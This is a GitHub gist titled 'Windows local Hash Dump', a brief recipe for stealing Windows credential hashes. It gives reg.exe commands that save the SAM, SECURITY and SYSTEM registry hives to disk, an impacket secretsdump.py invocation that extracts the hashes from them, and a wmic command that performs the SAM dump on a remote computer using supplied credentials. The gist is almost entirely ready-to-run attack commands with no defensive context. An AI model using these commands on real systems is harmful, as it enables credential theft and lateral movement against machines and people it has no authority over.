Skip to content

Instantly share code, notes, and snippets.

@sh1n0b1
Last active December 8, 2023 21:53
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save sh1n0b1/8972807 to your computer and use it in GitHub Desktop.
Save sh1n0b1/8972807 to your computer and use it in GitHub Desktop.
Windows local Hash Dump
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py
#Do this remotely
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment